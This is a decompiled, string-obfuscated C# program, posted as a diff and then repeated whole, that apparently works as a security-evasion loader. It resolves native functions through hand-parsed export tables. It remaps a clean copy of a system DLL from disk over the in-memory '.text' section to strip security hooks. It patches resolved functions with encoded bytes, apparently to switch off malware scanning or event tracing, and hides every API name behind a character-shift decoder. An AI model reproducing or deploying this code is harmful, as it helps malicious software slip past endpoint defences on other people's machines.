hUwUtao · September 19, 2023 16:21
diff --git a/Class0.cs b/Class0.cs
 using System;
 using System.Diagnostics;
 using System.Runtime.InteropServices;
 using System.Text;

 namespace EdvgVD
 {
    // Token: 0x02000002 RID: 2
    internal class Class0
    {
 // Token: 0x04000001 RID: 1
        private static readonly Process Process0 = Process.GetCurrentProcess();

 // Token: 0x04000002 RID: 2
        private static readonly SnnkTwxWvo SnnkTwxWvo0 = Marshal.GetDelegateForFunctionPointer<SnnkTwxWvo>(smethod_2(
            MasterModule.StringDecode("啒啌啙啕啌啓唚唙唕啋啓啓", -500542233),
            MasterModule.StringDecode("铠锉锌锐锂铥链锋锁锉锂", 2053936285)));

 // Token: 0x04000003 RID: 3
        private static readonly CsklprZdjd CsklprZdjd0 = Marshal.GetDelegateForFunctionPointer<CsklprZdjd>(smethod_2(
            MasterModule.StringDecode("榁楻榈榄楻概楉楈楄楺概概", 1449879830),
            MasterModule.StringDecode("땨떔떇떇땮떋떄떔떃떔떛",
                -529681118)));

 // Token: 0x04000004 RID: 4
        private static readonly BuuqRlTrkB BuuqRlTrkB0 = Marshal.GetDelegateForFunctionPointer<BuuqRlTrkB>(smethod_2(
            MasterModule.StringDecode("", -1944456990),
            MasterModule.StringDecode(
                "\udeb2\udec5\udece\uded0\uded1\udebd\udec8\udeac\udece\udecb\uded0\udec1\udebf\uded0",
                1052892764)));

 // Token: 0x04000005 RID: 5
        private static readonly HGpyNxaPNy HGpyNxaPNy0 = Marshal.GetDelegateForFunctionPointer<HGpyNxaPNy>(smethod_2(
            MasterModule.StringDecode("綾綸緅緁綸綿綆綅綁綷綿綿", 257523027),
            MasterModule.StringDecode("멼몫몞몚몭몞멿몢몥몞멺",
                248494649)));

 // Token: 0x04000006 RID: 6
        private static readonly JgHrUYuwVv JghrUYuwVv0 = Marshal.GetDelegateForFunctionPointer<JgHrUYuwVv>(smethod_2(
            MasterModule.StringDecode("涴涮涻涷涮涵浼浻海涭涵涵", -1961267895),
            MasterModule.StringDecode("秹稨稛稗稪稛秼稟稢稛稃稗稦稦稟稤稝秷", -433620554)));

 // Token: 0x04000007 RID: 7
        private static readonly OZwpHxsXtH OZwpHxsXtH0 = Marshal.GetDelegateForFunctionPointer<OZwpHxsXtH>(smethod_2(
            MasterModule.StringDecode("ﮠﮚﮧﮣﮚﮡﭨﭧﭣﮙﮡﮡ",
                985660213),
            MasterModule.StringDecode("蛛蛯蛾蛤蛷蛳蜅蛝蛴蛔蛷蛺蛳",
                -661289330)));

 // Token: 0x04000008 RID: 8
        private static readonly CgLuGvcMyS CgLuGvcMyS0 = Marshal.GetDelegateForFunctionPointer<CgLuGvcMyS>(smethod_2(
            MasterModule.StringDecode("", 826732802),
            MasterModule.StringDecode("뷅붽뷅붻뷈뷑", -116802216)));

 // Token: 0x04000009 RID: 9
        private static readonly RkpKtVNcwS RkpKtVNcwS0 = Marshal.GetDelegateForFunctionPointer<RkpKtVNcwS>(smethod_2(
            MasterModule.StringDecode("즈즋쥹즈즁쥆쥼즄즄", -1428633320),
            MasterModule.StringDecode("", 1906766718)));

 // Token: 0x0400000A RID: 10
        private static readonly QwvpmikZqq QwvpmikZqq0 = Marshal.GetDelegateForFunctionPointer<QwvpmikZqq>(smethod_2(
            MasterModule.StringDecode("”‗․†‗„ῥῤῠ‖„„", 386801586),
            MasterModule.StringDecode("ꃄꃮꃒꃪꃲꂱꂯꃋꃭꃪꃞꃠꃮꃮ",
                -1364352901)));

 // Token: 0x06000002 RID: 2 RVA: 0x00002358 File Offset: 0x00000558
 public static void Main()
        {
            const string @string = "䢸䢾䢮䢶䢶䡸䢮䢶䢶";
            // 96515219;

            smethod_1(MasterModule.StringDecode(@string,
                232867914));
            if (Environment.OSVersion.Version.Major >= 10 || IntPtr.Size == Math.Abs(Math.Min(8, Math.Abs(2147483647))))
                smethod_1(MasterModule.StringDecode("╥╟╬╨╟╦┭┬┨╞╦╦", 311502074));
            smethod_0(MasterModule.StringDecode("￳\u0005￻￀￶", 731971474),
                MasterModule.StringDecode("札杙束杕朿杏杍杚朮条杒杒村杞", 934438636),
                Convert.FromBase64String(MasterModule.StringDecode("䀅㿖㿳㿑㿒㿄㿔㿔",
                    7618448)),
                Convert.FromBase64String(MasterModule.StringDecode("⧝⦮⧋⦩⦪⦜⦬⦫⦯⦩⦩⦥",
                    -1365235352)));
            smethod_0(MasterModule.StringDecode("", -198971527),
                MasterModule.StringDecode(
                    "\udbe3\udc12\udc15\udbe3\udc14\udc03\udc0c\udc12\udbf5\udc10\udc07\udc12\udc03",
                    -20391010),
                Convert.FromBase64String(MasterModule.StringDecode("⑂⑂␈␈", -1909972021)),
                Convert.FromBase64String(MasterModule.StringDecode("僬僝僆傶",
                    -623488907)));
        }

 // Token: 0x06000003 RID: 3 RVA: 0x00002DD8 File Offset: 0x00000FD8
        private static void smethod_0(string string0, string string1, byte[] byte0, byte[] byte1)
        {
            try
            {
                var intPtr = smethod_2(string0, string1);
                if (intPtr == IntPtr.Zero) throw new Exception();
                var size = IntPtr.Size;
                var num = 6;
                var num2 = num + sizeof(ushort);

                byte[] array;
                array = size == num2 ? byte0 : byte1;
                BuuqRlTrkB0(intPtr, (IntPtr)array.Length,
                    64, out var newProtect);
                Marshal.Copy(array, 0, intPtr, array.Length);
                BuuqRlTrkB0(intPtr, (IntPtr)array.Length, newProtect, out newProtect);
            }

            catch
            {
                // ignored
            }
        }

 // Token: 0x06000004 RID: 4 RVA: 0x00002F70 File Offset: 0x00001170
        private static void smethod_1(string string0)
        {
            try
            {
                QwvpmikZqq0(Process0.Handle, out var flag);
                const string @string = "ꪺꪱ꫓꫎ꫠꫥꫛꫦꫮꫪ꫓꫊꫰ꫪꫫꫜꫤꪪꪩ꫓";
                // 2;

                var str = MasterModule.StringDecode(@string, -1755796873);
                if (flag && IntPtr.Size == Math.Abs(Math.Min(4, Math.Abs(2147483647))))
                    str = MasterModule.StringDecode("큫큢킄큿킑킖킌킗킟킛킄큻킡킛큿큷큿큞큜킄", -2124099544);
                var intPtr = smethod_3(string0);
                if (!(intPtr == IntPtr.Zero))
                {
                    unsafe
                    {
                        if (!RkpKtVNcwS0(Process0.Handle, intPtr, out var rEIlnncGsj, (uint)sizeof(ReIlnncGsj))) return;
                        var intPtr2 = HGpyNxaPNy0(str + string0, 2147483648U,
                            1,
                            IntPtr.Zero,
                            3, 0U, IntPtr.Zero);
                        if (intPtr2 == (IntPtr)(-1))
                        {
                            SnnkTwxWvo0(intPtr2);
                        }
                        else
                        {
                            var intPtr3 = JghrUYuwVv0(intPtr2, IntPtr.Zero,
                                16777218, 0U, 0U, null);
                            if (intPtr3 == IntPtr.Zero)
                            {
                                SnnkTwxWvo0(intPtr3);
                            }
                            else
                            {
                                var intPtr4 = OZwpHxsXtH0(intPtr3,
                                    4, 0U, 0U,
                                    IntPtr.Zero);
                                if (intPtr4 == IntPtr.Zero) return;
                                var num2 = Marshal.ReadInt32((IntPtr)((long)rEIlnncGsj.BaseOfDll + 60));
                                var num3 = Marshal.ReadInt16((IntPtr)((long)intPtr + num2 + 6));
                                var num4 = Marshal.ReadInt16(intPtr,
                                    num2 + 20);
                                for (short num5 = 0;
                                     num5 < num3;
                                     num5 = (short)(num5 + 1))
                                {
                                    var intPtr5 = (IntPtr)((long)intPtr + num2 + 24 + num4 + num5 * 40);
                                    if (Marshal.ReadByte(intPtr5) != 46 ||
                                        Marshal.ReadByte((IntPtr)((long)intPtr5 + 1)) != 116 ||
                                        Marshal.ReadByte((IntPtr)((long)intPtr5 + 2)) != 101 ||
                                        Marshal.ReadByte((IntPtr)((long)intPtr5 + 3)) != 120 ||
                                        Marshal.ReadByte((IntPtr)((long)intPtr5 + 4)) != 116) continue;
                                    var num6 = Marshal.ReadInt32((IntPtr)((long)intPtr5 + 12));
                                    var num7 = (uint)Marshal.ReadInt32((IntPtr)((long)intPtr5 + 8));
                                    BuuqRlTrkB0((IntPtr)((long)intPtr + num6), (IntPtr)num7, 64,
                                        out var newProtect);
                                    CgLuGvcMyS0((IntPtr)((long)intPtr + num6),
                                        (IntPtr)((long)intPtr4 + num6), (IntPtr)num7);
                                    BuuqRlTrkB0((IntPtr)((long)intPtr + num6), (IntPtr)num7, newProtect,
                                        out newProtect);
                                    SnnkTwxWvo0(intPtr3);
                                    SnnkTwxWvo0(intPtr2);
                                    CsklprZdjd0(intPtr);
                                    return;
                                }

 // goto IL_B97;
                            }
                        }
                    }
                }
            }

            catch
            {
                // ignored
            }
        }

 // Token: 0x06000005 RID: 5 RVA: 0x00002050 File Offset: 0x00000250
        public static IntPtr smethod_2(string string0, string string1)
        {
            return smethod_4(smethod_3(string0), string1);
        }

 // Token: 0x06000006 RID: 6 RVA: 0x00003B5C File Offset: 0x00001D5C
        public static IntPtr smethod_3(string string0)
        {
            var modules = Process0.Modules;
            foreach (var obj in modules)
            {
                var processModule = (ProcessModule)obj;
                if (processModule.FileName.ToLower().EndsWith(string0.ToLower())) return processModule.BaseAddress;
            }

            return IntPtr.Zero;
        }

 // Token: 0x06000007 RID: 7 RVA: 0x00003BE0 File Offset: 0x00001DE0
        public static IntPtr smethod_4(IntPtr intptr0, string string0)
        {
            var intPtr = IntPtr.Zero;
            try
            {
                var num = intptr0.ToInt64();
                int num3;
                var num2 = 52;
                num3 = num2 + sizeof(ulong);

                var num4 = Marshal.ReadInt32((IntPtr)(num + num3));
                Marshal.ReadInt16((IntPtr)(intptr0.ToInt64() + num4 +
                                           20));
                var num5 = intptr0.ToInt64() + num4 + 24;
                var num6 = Marshal.ReadInt16((IntPtr)num5);
                long value;
                if (num6 == Math.Abs(Math.Min(267, Math.Abs(2147483647))))
                    value = num5 + 96;
                else
                    value = num5 + 112;
                var num7 = Marshal.ReadInt32((IntPtr)value);
                var num8 = Marshal.ReadInt32((IntPtr)(intptr0.ToInt64() + num7 + Math.Abs(Math
                    .Min(16, Math.Abs(int.MaxValue)))));
                Marshal.ReadInt32((IntPtr)(intptr0.ToInt64() + num7 + 20));
                var num9 = Marshal.ReadInt32((IntPtr)(intptr0.ToInt64() + num7 +
                                                      24));
                var num10 = Marshal.ReadInt32((IntPtr)(intptr0.ToInt64() + num7 +
                                                       28));
                var num11 = Marshal.ReadInt32((IntPtr)(intptr0.ToInt64() + num7 +
                                                       32));
                var num12 = Marshal.ReadInt32((IntPtr)(intptr0.ToInt64() + num7 +
                                                       36));
                for (var i = 0; i < num9; i += 1)
                {
                    var text = Marshal.PtrToStringAnsi((IntPtr)(intptr0.ToInt64() + Marshal.ReadInt32(
                        (IntPtr)(intptr0.ToInt64() + num11 +
                                 i * 4))));
                    if (text != null && text.Equals(string0,
                            (StringComparison)Math.Abs(Math.Min(5, Math.Abs(2147483647)))))
                    {
                        var num13 = Marshal.ReadInt16((IntPtr)(intptr0.ToInt64() + num12 +
                                                               i * 2)) + num8;
                        var num14 = Marshal.ReadInt32((IntPtr)(intptr0.ToInt64() + num10 +
                                                               4 *
                                                               (num13 - num8)));
                        intPtr = (IntPtr)((long)intptr0 + num14);
                        break;
                    }
                }
            }

            catch
            {
                throw new InvalidOperationException();
            }

            if (intPtr == IntPtr.Zero) throw new MissingMethodException();
            return intPtr;
        }

 // Token: 0x02000003 RID: 3
        public struct ReIlnncGsj
        {
 // Token: 0x0400000B RID: 11
            public IntPtr BaseOfDll;

 // Token: 0x0400000C RID: 12
            public uint SizeOfImage;

 // Token: 0x0400000D RID: 13
            public IntPtr EntryPoint;
        }

 // Token: 0x02000004 RID: 4
 // (Invoke) Token: 0x0600000B RID: 11
        private delegate bool SnnkTwxWvo(IntPtr handle);

 // Token: 0x02000005 RID: 5
 // (Invoke) Token: 0x0600000F RID: 15
        private delegate bool CsklprZdjd(IntPtr module);

 // Token: 0x02000006 RID: 6
 // (Invoke) Token: 0x06000013 RID: 19
        private delegate int BuuqRlTrkB(IntPtr address, IntPtr size, uint newProtect, out uint oldProtect);

 // Token: 0x02000007 RID: 7
 // (Invoke) Token: 0x06000017 RID: 23
        private delegate IntPtr HGpyNxaPNy(string fileName, uint desiredAccess, uint shareMode,
            IntPtr securityAttributes,
            uint creationDisposition, uint flagsAndAttributes, IntPtr templateFile);

 // Token: 0x02000008 RID: 8
 // (Invoke) Token: 0x0600001B RID: 27
        private delegate IntPtr JgHrUYuwVv(IntPtr file, IntPtr fileMappingAttributes, uint protect,
            uint maximumSizeHigh,
            uint maximumSizeLow, string name);

 // Token: 0x02000009 RID: 9
 // (Invoke) Token: 0x0600001F RID: 31
        private delegate IntPtr OZwpHxsXtH(IntPtr fileMappingObject, uint desiredAccess, uint fileOffsetHigh,
            uint fileOffsetLow, IntPtr numberOfBytesToMap);

 // Token: 0x0200000A RID: 10
 // (Invoke) Token: 0x06000023 RID: 35
        [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
        private delegate IntPtr CgLuGvcMyS(IntPtr dest, IntPtr src, IntPtr count);

 // Token: 0x0200000B RID: 11
 // (Invoke) Token: 0x06000027 RID: 39
        private delegate bool RkpKtVNcwS(IntPtr process, IntPtr module, out ReIlnncGsj moduleInfo, uint size);

 // Token: 0x0200000C RID: 12
 // (Invoke) Token: 0x0600002B RID: 43
        private delegate bool QwvpmikZqq([In] IntPtr hProcess, out bool wow64Process);
    }

    internal class MasterModule
    {
        public void Main()
        {
            Console.WriteLine(StringDecode("”‗․†‗„ῥῤῠ‖„„", 386801586));
        }

        public static string StringDecode(string str0, int int1)
        {
            var stringBuilder = new StringBuilder();
            var array = str0.ToCharArray();
            for (var i = 0; i < array.Length; i++)
            {
                var c = array[i];
                stringBuilder.Append((char)(c - int1));
            }

            return stringBuilder.ToString();
        }
    }
 }
	using System;
	using System.Diagnostics;
	using System.Runtime.InteropServices;
	using System.Text;

	namespace EdvgVD
	{
	// Token: 0x02000002 RID: 2
	internal class Class0
	{
	// Token: 0x04000001 RID: 1
	private static readonly Process Process0 = Process.GetCurrentProcess();

	// Token: 0x04000002 RID: 2
	private static readonly SnnkTwxWvo SnnkTwxWvo0 = Marshal.GetDelegateForFunctionPointer<SnnkTwxWvo>(smethod_2(
	MasterModule.StringDecode("啒啌啙啕啌啓唚唙唕啋啓啓", -500542233),
	MasterModule.StringDecode("铠锉锌锐锂铥链锋锁锉锂", 2053936285)));

	// Token: 0x04000003 RID: 3
	private static readonly CsklprZdjd CsklprZdjd0 = Marshal.GetDelegateForFunctionPointer<CsklprZdjd>(smethod_2(
	MasterModule.StringDecode("榁楻榈榄楻概楉楈楄楺概概", 1449879830),
	MasterModule.StringDecode("땨떔떇떇땮떋떄떔떃떔떛",
	-529681118)));

	// Token: 0x04000004 RID: 4
	private static readonly BuuqRlTrkB BuuqRlTrkB0 = Marshal.GetDelegateForFunctionPointer<BuuqRlTrkB>(smethod_2(
	MasterModule.StringDecode("", -1944456990),
	MasterModule.StringDecode(
	"\udeb2\udec5\udece\uded0\uded1\udebd\udec8\udeac\udece\udecb\uded0\udec1\udebf\uded0",
	1052892764)));

	// Token: 0x04000005 RID: 5
	private static readonly HGpyNxaPNy HGpyNxaPNy0 = Marshal.GetDelegateForFunctionPointer<HGpyNxaPNy>(smethod_2(
	MasterModule.StringDecode("綾綸緅緁綸綿綆綅綁綷綿綿", 257523027),
	MasterModule.StringDecode("멼몫몞몚몭몞멿몢몥몞멺",
	248494649)));

	// Token: 0x04000006 RID: 6
	private static readonly JgHrUYuwVv JghrUYuwVv0 = Marshal.GetDelegateForFunctionPointer<JgHrUYuwVv>(smethod_2(
	MasterModule.StringDecode("涴涮涻涷涮涵浼浻海涭涵涵", -1961267895),
	MasterModule.StringDecode("秹稨稛稗稪稛秼稟稢稛稃稗稦稦稟稤稝秷", -433620554)));

	// Token: 0x04000007 RID: 7
	private static readonly OZwpHxsXtH OZwpHxsXtH0 = Marshal.GetDelegateForFunctionPointer<OZwpHxsXtH>(smethod_2(
	MasterModule.StringDecode("ﮠﮚﮧﮣﮚﮡﭨﭧﭣﮙﮡﮡ",
	985660213),
	MasterModule.StringDecode("蛛蛯蛾蛤蛷蛳蜅蛝蛴蛔蛷蛺蛳",
	-661289330)));

	// Token: 0x04000008 RID: 8
	private static readonly CgLuGvcMyS CgLuGvcMyS0 = Marshal.GetDelegateForFunctionPointer<CgLuGvcMyS>(smethod_2(
	MasterModule.StringDecode("", 826732802),
	MasterModule.StringDecode("뷅붽뷅붻뷈뷑", -116802216)));

	// Token: 0x04000009 RID: 9
	private static readonly RkpKtVNcwS RkpKtVNcwS0 = Marshal.GetDelegateForFunctionPointer<RkpKtVNcwS>(smethod_2(
	MasterModule.StringDecode("즈즋쥹즈즁쥆쥼즄즄", -1428633320),
	MasterModule.StringDecode("", 1906766718)));

	// Token: 0x0400000A RID: 10
	private static readonly QwvpmikZqq QwvpmikZqq0 = Marshal.GetDelegateForFunctionPointer<QwvpmikZqq>(smethod_2(
	MasterModule.StringDecode("”‗․†‗„ῥῤῠ‖„„", 386801586),
	MasterModule.StringDecode("ꃄꃮꃒꃪꃲꂱꂯꃋꃭꃪꃞꃠꃮꃮ",
	-1364352901)));

	// Token: 0x06000002 RID: 2 RVA: 0x00002358 File Offset: 0x00000558
	public static void Main()
	{
	const string @string = "䢸䢾䢮䢶䢶䡸䢮䢶䢶";
	// 96515219;

	smethod_1(MasterModule.StringDecode(@string,
	232867914));
	if (Environment.OSVersion.Version.Major >= 10 \|\| IntPtr.Size == Math.Abs(Math.Min(8, Math.Abs(2147483647))))
	smethod_1(MasterModule.StringDecode("╥╟╬╨╟╦┭┬┨╞╦╦", 311502074));
	smethod_0(MasterModule.StringDecode("￳\u0005￻￀￶", 731971474),
	MasterModule.StringDecode("札杙束杕朿杏杍杚朮条杒杒村杞", 934438636),
	Convert.FromBase64String(MasterModule.StringDecode("䀅㿖㿳㿑㿒㿄㿔㿔",
	7618448)),
	Convert.FromBase64String(MasterModule.StringDecode("⧝⦮⧋⦩⦪⦜⦬⦫⦯⦩⦩⦥",
	-1365235352)));
	smethod_0(MasterModule.StringDecode("", -198971527),
	MasterModule.StringDecode(
	"\udbe3\udc12\udc15\udbe3\udc14\udc03\udc0c\udc12\udbf5\udc10\udc07\udc12\udc03",
	-20391010),
	Convert.FromBase64String(MasterModule.StringDecode("⑂⑂␈␈", -1909972021)),
	Convert.FromBase64String(MasterModule.StringDecode("僬僝僆傶",
	-623488907)));
	}

	// Token: 0x06000003 RID: 3 RVA: 0x00002DD8 File Offset: 0x00000FD8
	private static void smethod_0(string string0, string string1, byte[] byte0, byte[] byte1)
	{
	try
	{
	var intPtr = smethod_2(string0, string1);
	if (intPtr == IntPtr.Zero) throw new Exception();
	var size = IntPtr.Size;
	var num = 6;
	var num2 = num + sizeof(ushort);

	byte[] array;
	array = size == num2 ? byte0 : byte1;
	BuuqRlTrkB0(intPtr, (IntPtr)array.Length,
	64, out var newProtect);
	Marshal.Copy(array, 0, intPtr, array.Length);
	BuuqRlTrkB0(intPtr, (IntPtr)array.Length, newProtect, out newProtect);
	}

	catch
	{
	// ignored
	}
	}

	// Token: 0x06000004 RID: 4 RVA: 0x00002F70 File Offset: 0x00001170
	private static void smethod_1(string string0)
	{
	try
	{
	QwvpmikZqq0(Process0.Handle, out var flag);
	const string @string = "ꪺꪱ꫓꫎ꫠꫥꫛꫦꫮꫪ꫓꫊꫰ꫪꫫꫜꫤꪪꪩ꫓";
	// 2;

	var str = MasterModule.StringDecode(@string, -1755796873);
	if (flag && IntPtr.Size == Math.Abs(Math.Min(4, Math.Abs(2147483647))))
	str = MasterModule.StringDecode("큫큢킄큿킑킖킌킗킟킛킄큻킡킛큿큷큿큞큜킄", -2124099544);
	var intPtr = smethod_3(string0);
	if (!(intPtr == IntPtr.Zero))
	{
	unsafe
	{
	if (!RkpKtVNcwS0(Process0.Handle, intPtr, out var rEIlnncGsj, (uint)sizeof(ReIlnncGsj))) return;
	var intPtr2 = HGpyNxaPNy0(str + string0, 2147483648U,
	1,
	IntPtr.Zero,
	3, 0U, IntPtr.Zero);
	if (intPtr2 == (IntPtr)(-1))
	{
	SnnkTwxWvo0(intPtr2);
	}
	else
	{
	var intPtr3 = JghrUYuwVv0(intPtr2, IntPtr.Zero,
	16777218, 0U, 0U, null);
	if (intPtr3 == IntPtr.Zero)
	{
	SnnkTwxWvo0(intPtr3);
	}
	else
	{
	var intPtr4 = OZwpHxsXtH0(intPtr3,
	4, 0U, 0U,
	IntPtr.Zero);
	if (intPtr4 == IntPtr.Zero) return;
	var num2 = Marshal.ReadInt32((IntPtr)((long)rEIlnncGsj.BaseOfDll + 60));
	var num3 = Marshal.ReadInt16((IntPtr)((long)intPtr + num2 + 6));
	var num4 = Marshal.ReadInt16(intPtr,
	num2 + 20);
	for (short num5 = 0;
	num5 < num3;
	num5 = (short)(num5 + 1))
	{
	var intPtr5 = (IntPtr)((long)intPtr + num2 + 24 + num4 + num5 * 40);
	if (Marshal.ReadByte(intPtr5) != 46 \|\|
	Marshal.ReadByte((IntPtr)((long)intPtr5 + 1)) != 116 \|\|
	Marshal.ReadByte((IntPtr)((long)intPtr5 + 2)) != 101 \|\|
	Marshal.ReadByte((IntPtr)((long)intPtr5 + 3)) != 120 \|\|
	Marshal.ReadByte((IntPtr)((long)intPtr5 + 4)) != 116) continue;
	var num6 = Marshal.ReadInt32((IntPtr)((long)intPtr5 + 12));
	var num7 = (uint)Marshal.ReadInt32((IntPtr)((long)intPtr5 + 8));
	BuuqRlTrkB0((IntPtr)((long)intPtr + num6), (IntPtr)num7, 64,
	out var newProtect);
	CgLuGvcMyS0((IntPtr)((long)intPtr + num6),
	(IntPtr)((long)intPtr4 + num6), (IntPtr)num7);
	BuuqRlTrkB0((IntPtr)((long)intPtr + num6), (IntPtr)num7, newProtect,
	out newProtect);
	SnnkTwxWvo0(intPtr3);
	SnnkTwxWvo0(intPtr2);
	CsklprZdjd0(intPtr);
	return;
	}

	// goto IL_B97;
	}
	}
	}
	}
	}

	catch
	{
	// ignored
	}
	}

	// Token: 0x06000005 RID: 5 RVA: 0x00002050 File Offset: 0x00000250
	public static IntPtr smethod_2(string string0, string string1)
	{
	return smethod_4(smethod_3(string0), string1);
	}

	// Token: 0x06000006 RID: 6 RVA: 0x00003B5C File Offset: 0x00001D5C
	public static IntPtr smethod_3(string string0)
	{
	var modules = Process0.Modules;
	foreach (var obj in modules)
	{
	var processModule = (ProcessModule)obj;
	if (processModule.FileName.ToLower().EndsWith(string0.ToLower())) return processModule.BaseAddress;
	}

	return IntPtr.Zero;
	}

	// Token: 0x06000007 RID: 7 RVA: 0x00003BE0 File Offset: 0x00001DE0
	public static IntPtr smethod_4(IntPtr intptr0, string string0)
	{
	var intPtr = IntPtr.Zero;
	try
	{
	var num = intptr0.ToInt64();
	int num3;
	var num2 = 52;
	num3 = num2 + sizeof(ulong);

	var num4 = Marshal.ReadInt32((IntPtr)(num + num3));
	Marshal.ReadInt16((IntPtr)(intptr0.ToInt64() + num4 +
	20));
	var num5 = intptr0.ToInt64() + num4 + 24;
	var num6 = Marshal.ReadInt16((IntPtr)num5);
	long value;
	if (num6 == Math.Abs(Math.Min(267, Math.Abs(2147483647))))
	value = num5 + 96;
	else
	value = num5 + 112;
	var num7 = Marshal.ReadInt32((IntPtr)value);
	var num8 = Marshal.ReadInt32((IntPtr)(intptr0.ToInt64() + num7 + Math.Abs(Math
	.Min(16, Math.Abs(int.MaxValue)))));
	Marshal.ReadInt32((IntPtr)(intptr0.ToInt64() + num7 + 20));
	var num9 = Marshal.ReadInt32((IntPtr)(intptr0.ToInt64() + num7 +
	24));
	var num10 = Marshal.ReadInt32((IntPtr)(intptr0.ToInt64() + num7 +
	28));
	var num11 = Marshal.ReadInt32((IntPtr)(intptr0.ToInt64() + num7 +
	32));
	var num12 = Marshal.ReadInt32((IntPtr)(intptr0.ToInt64() + num7 +
	36));
	for (var i = 0; i < num9; i += 1)
	{
	var text = Marshal.PtrToStringAnsi((IntPtr)(intptr0.ToInt64() + Marshal.ReadInt32(
	(IntPtr)(intptr0.ToInt64() + num11 +
	i * 4))));
	if (text != null && text.Equals(string0,
	(StringComparison)Math.Abs(Math.Min(5, Math.Abs(2147483647)))))
	{
	var num13 = Marshal.ReadInt16((IntPtr)(intptr0.ToInt64() + num12 +
	i * 2)) + num8;
	var num14 = Marshal.ReadInt32((IntPtr)(intptr0.ToInt64() + num10 +
	4 *
	(num13 - num8)));
	intPtr = (IntPtr)((long)intptr0 + num14);
	break;
	}
	}
	}

	catch
	{
	throw new InvalidOperationException();
	}

	if (intPtr == IntPtr.Zero) throw new MissingMethodException();
	return intPtr;
	}

	// Token: 0x02000003 RID: 3
	public struct ReIlnncGsj
	{
	// Token: 0x0400000B RID: 11
	public IntPtr BaseOfDll;

	// Token: 0x0400000C RID: 12
	public uint SizeOfImage;

	// Token: 0x0400000D RID: 13
	public IntPtr EntryPoint;
	}

	// Token: 0x02000004 RID: 4
	// (Invoke) Token: 0x0600000B RID: 11
	private delegate bool SnnkTwxWvo(IntPtr handle);

	// Token: 0x02000005 RID: 5
	// (Invoke) Token: 0x0600000F RID: 15
	private delegate bool CsklprZdjd(IntPtr module);

	// Token: 0x02000006 RID: 6
	// (Invoke) Token: 0x06000013 RID: 19
	private delegate int BuuqRlTrkB(IntPtr address, IntPtr size, uint newProtect, out uint oldProtect);

	// Token: 0x02000007 RID: 7
	// (Invoke) Token: 0x06000017 RID: 23
	private delegate IntPtr HGpyNxaPNy(string fileName, uint desiredAccess, uint shareMode,
	IntPtr securityAttributes,
	uint creationDisposition, uint flagsAndAttributes, IntPtr templateFile);

	// Token: 0x02000008 RID: 8
	// (Invoke) Token: 0x0600001B RID: 27
	private delegate IntPtr JgHrUYuwVv(IntPtr file, IntPtr fileMappingAttributes, uint protect,
	uint maximumSizeHigh,
	uint maximumSizeLow, string name);

	// Token: 0x02000009 RID: 9
	// (Invoke) Token: 0x0600001F RID: 31
	private delegate IntPtr OZwpHxsXtH(IntPtr fileMappingObject, uint desiredAccess, uint fileOffsetHigh,
	uint fileOffsetLow, IntPtr numberOfBytesToMap);

	// Token: 0x0200000A RID: 10
	// (Invoke) Token: 0x06000023 RID: 35
	[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
	private delegate IntPtr CgLuGvcMyS(IntPtr dest, IntPtr src, IntPtr count);

	// Token: 0x0200000B RID: 11
	// (Invoke) Token: 0x06000027 RID: 39
	private delegate bool RkpKtVNcwS(IntPtr process, IntPtr module, out ReIlnncGsj moduleInfo, uint size);

	// Token: 0x0200000C RID: 12
	// (Invoke) Token: 0x0600002B RID: 43
	private delegate bool QwvpmikZqq([In] IntPtr hProcess, out bool wow64Process);
	}

	internal class MasterModule
	{
	public void Main()
	{
	Console.WriteLine(StringDecode("”‗․†‗„ῥῤῠ‖„„", 386801586));
	}

	public static string StringDecode(string str0, int int1)
	{
	var stringBuilder = new StringBuilder();
	var array = str0.ToCharArray();
	for (var i = 0; i < array.Length; i++)
	{
	var c = array[i];
	stringBuilder.Append((char)(c - int1));
	}

	return stringBuilder.ToString();
	}
	}
	}